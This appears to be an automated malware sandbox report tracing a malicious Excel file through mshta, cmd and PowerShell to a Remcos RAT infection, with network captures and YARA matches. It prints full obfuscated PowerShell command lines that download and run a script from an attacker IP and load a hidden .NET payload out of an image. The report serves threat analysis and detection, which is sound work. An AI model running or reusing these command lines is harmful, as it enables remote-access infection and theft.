                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                    cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                    cross-origin-resource-policy: same-origin
                                                                                                                                                                                                                    x-dns-prefetch-control: off
                                                                                                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                    strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                                    x-download-options: noopen
                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                    origin-agent-cluster: ?1
                                                                                                                                                                                                                    x-permitted-cross-domain-policies: none
                                                                                                                                                                                                                    referrer-policy: no-referrer
                                                                                                                                                                                                                    x-xss-protection: 0
                                                                                                                                                                                                                    location: http://192.3.220.40/330/uh/newthingtobeonlinefor.hta
                                                                                                                                                                                                                    vary: Accept, Accept-Encoding
                                                                                                                                                                                                                    x-do-app-origin: 3c056774-18e7-416f-a7dd-69134c01d081
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    x-do-orig-status: 302
                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A2xk0jt4gVcB2uEtNlTL6oT3CKNin9DeGa%2F87%2Bpn7EWKZxDrBENe9DRExLHhl7VTRVgbisKiKKgzGN71%2FVv7OM%2FlOE4TUTavkEOPbuvmtqB%2BnxJ30td3hcYwhg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                    CF-RAY: 8cf672df6b3d0cc4-EWR
2024-10-08 13:24:00 UTC | 74 | IN | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 34 30 2f 33 33 30 2f 75 68 2f 6e 65 77 74 68 69 6e 67 74 6f 62 65 6f 6e 6c 69 6e 65 66 6f 72 2e 68 74 61
                                                                                                                                                                                                                    Data Ascii: Found. Redirecting to http://192.3.220.40/330/uh/newthingtobeonlinefor.hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.22 | 49176 | 207.241.227.242 | 443 | 3784 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 13:24:15 UTC | 117 | OUT | GET /32/items/detah-note-v_202410/DetahNote_V.jpg HTTP/1.1
                                                                                                                                                                                                                    Host: ia600102.us.archive.org
                                                                                                                                                                                                                    Connection: Keep-Alive
2024-10-08 13:24:16 UTC | 591 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                    Date: Tue, 08 Oct 2024 13:24:15 GMT
                                                                                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                                                                                    Content-Length: 6331693
                                                                                                                                                                                                                    Last-Modified: Tue, 08 Oct 2024 03:49:30 GMT
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    ETag: "6704abca-609d2d"
                                                                                                                                                                                                                    Strict-Transport-Security: max-age=15724800
                                                                                                                                                                                                                    Expires: Tue, 08 Oct 2024 19:24:15 GMT
                                                                                                                                                                                                                    Cache-Control: max-age=21600
                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                    Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Data Ascii: Ghh1is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z



                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                    Start time:09:23:14
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                                                                    Imagebase:0x13f880000
                                                                                                                                                                                                                    File size:28'253'536 bytes
                                                                                                                                                                                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                    Start time:09:23:40
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                                                                                                                                    Imagebase:0x13fed0000
                                                                                                                                                                                                                    File size:13'824 bytes
                                                                                                                                                                                                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                    Start time:09:23:43
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                                                                                                                                                                                                                    Imagebase:0x4a080000
                                                                                                                                                                                                                    File size:345'088 bytes
                                                                                                                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                    Start time:09:23:44
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'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'+[ChaR]34+'))')))"
                                                                                                                                                                                                                    Imagebase:0x13fda0000
                                                                                                                                                                                                                    File size:443'392 bytes
                                                                                                                                                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                    Start time:09:23:47
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline"
                                                                                                                                                                                                                    Imagebase:0x13fa80000
                                                                                                                                                                                                                    File size:2'758'280 bytes
                                                                                                                                                                                                                    MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                    Start time:09:23:47
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3ED5.tmp" "c:\Users\user\AppData\Local\Temp\uvrrkyhh\CSC53416C506E684743ABB03B3747B68267.TMP"
                                                                                                                                                                                                                    Imagebase:0x13f030000
                                                                                                                                                                                                                    File size:52'744 bytes
                                                                                                                                                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                    Start time:09:23:52
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS"
                                                                                                                                                                                                                    Imagebase:0xff790000
                                                                                                                                                                                                                    File size:168'960 bytes
                                                                                                                                                                                                                    MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                                    Start time:09:23:52
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                                                                                                    Imagebase:0x13fda0000
                                                                                                                                                                                                                    File size:443'392 bytes
                                                                                                                                                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                    Start time:09:23:53
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"
                                                                                                                                                                                                                    Imagebase:0x13fda0000
                                                                                                                                                                                                                    File size:443'392 bytes
                                                                                                                                                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                    Start time:09:23:58
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                                                                                                                                    Imagebase:0x13f130000
                                                                                                                                                                                                                    File size:13'824 bytes
                                                                                                                                                                                                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                                    Start time:09:24:01
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                    Imagebase:0x980000
                                                                                                                                                                                                                    File size:64'704 bytes
                                                                                                                                                                                                                    MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.873711232.000000000248E000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.872848173.000000000088E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.872488880.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.872848173.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.872488880.0000000000851000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                                    Start time:09:24:01
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                                                                                                                                                                                                                    Imagebase:0x4ac30000
                                                                                                                                                                                                                    File size:345'088 bytes
                                                                                                                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                                    Start time:09:24:01
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                                                                                                                                                                                                                    Imagebase:0xffee0000
                                                                                                                                                                                                                    File size:443'392 bytes
                                                                                                                                                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                                    Start time:09:24:04
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jfaasddkn"
                                                                                                                                                                                                                    Imagebase:0x980000
                                                                                                                                                                                                                    File size:64'704 bytes
                                                                                                                                                                                                                    MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                                                    Start time:09:24:05
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.cmdline"
                                                                                                                                                                                                                    Imagebase:0x13ff60000
                                                                                                                                                                                                                    File size:2'758'280 bytes
                                                                                                                                                                                                                    MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                                                    Start time:09:24:05
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
